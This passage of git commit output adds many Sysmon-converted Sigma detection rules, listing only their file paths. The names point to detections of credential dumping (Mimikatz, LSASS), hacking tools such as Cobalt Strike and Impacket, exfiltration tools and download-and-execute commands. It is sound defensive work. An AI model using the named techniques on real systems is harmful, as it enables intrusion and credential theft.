tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cloudflared_portable_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cloudflared_tunnel_run.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_assoc_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_del_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_dir_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_dosfuscation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_http_appdata.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_no_space_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_path_traversal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_redirect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_rmdir_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_shadowcopy_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_stdin_redirect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmd_unusual_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmdkey_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_cmstp_execution_by_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_conhost_legacy_option.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_conhost_path_traversal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_conhost_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_conhost_uncommon_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_control_panel_item.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_createdump_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_csc_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_csi_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_csi_use_of_csharp_console.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_csvde_export.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_cookie_hijacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_custom_user_agent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_insecure_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_insecure_porxy_or_doh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_local_file_read.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_curl_susp_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_desktopimgdownldr_remote_file_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_devinit_lolbin_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dirlister_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_diskshadow_child_process_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_ext.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_diskshadow_script_mode_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dll_sideload_vmware_xfer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dllhost_no_cli_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dns_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dnscmd_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dotnet_trace_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_driverquery_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_driverquery_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dsacls_abuse_permissions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dsacls_password_spray.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dsim_remove.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dtrace_kernel_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dumpminitool_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_dumpminitool_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_esentutl_params.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_esentutl_sensitive_file_copy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_esentutl_webcache.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_eventvwr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_expand_cabinet_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_explorer_break_process_tree.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_explorer_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_explorer_nouaccheck.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_gpp_passwords.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_lnk.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_recon_everyone.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_recon_pipe_output.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_security_keyword_lookup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_subfolder_search.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_finger_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_fltmc_unload_driver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_forfiles_child_process_masquerading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_forfiles_proxy_execution_.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_fsutil_drive_enumeration.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_fsutil_usage.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_git_susp_clone.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_googleupdate_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gpg4win_decryption.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gpg4win_encryption.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gpg4win_portable_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gpg4win_susp_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gpresult_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gup_arbitrary_binary_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gup_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_gup_suspicious_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hh_chm_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hh_chm_remote_download_or_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hh_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_adcspwn.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_certify.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_certipy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_coercedpotato.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_covenant.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_createminidump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_dinjector.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_dumpert.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_edrsilencer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_evil_winrm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_gmer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_handlekatz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_hashcat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_hydra.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_impacket_tools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_impersonate.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_inveigh.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_var.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_compress.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_jlaive_batch_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_koadic.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_krbrelay.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_krbrelayup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_localpotato.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_meterpreter_getsystem.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_mimikatz_command_line.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_pchunter.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_powertool.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_pypykatz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_quarks_pwdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_rubeus.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_safetykatz.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_secutyxploded.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_selectmyparent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharp_chisel.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharp_impersonation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharpersist.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharpevtmute.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharpldapwhoami.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharpup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sharpview.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_stracciatella_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_sysmoneop.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_trufflesnout.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_uacme.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_wce.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_winpeas.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_winpwn.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_xordump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hktl_zipexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hostname_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hwp_exploits.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_hxtsr_masquerading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_icacls_deny.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ieexec_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_appcmd_http_logging.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_connection_strings_decryption.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_iis_susp_module_registration.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_imagingdevices_unusual_parents.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_imewbdld_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_installutil_download.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_instalutil_no_log_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_keytool_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_manageengine_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_remote_debugging.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_susp_child_process_2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_java_sysaidserver_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_kd_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ksetup_password_change_computer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ksetup_password_change_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ldifde_export.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ldifde_file_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_logman_disable_eventlog.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_cdb.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_cmdl32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_customshellhost.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dctask64_proc_inject.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_defaultpack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_diantz_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dnx.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dotnet.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dotnet_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_dump64.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_extexport.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_extrac32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_extrac32_ads.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_format.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_ftp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_gather_network_info.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_gpscript.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_ie4uinit.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_ilasm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_jsc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_kavremover.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_manage_bde.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_mpiexec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_msdeploy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_openconsole.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_openwith.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pcalua.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pcwrun.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pcwutl.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pester.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pester_1.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_printbrm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_pubprn.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_register_app.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_remote.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_replace.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_runexehelper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_runscripthelper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_scriptrunner.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_lolbin_setres.yml create mode 100644 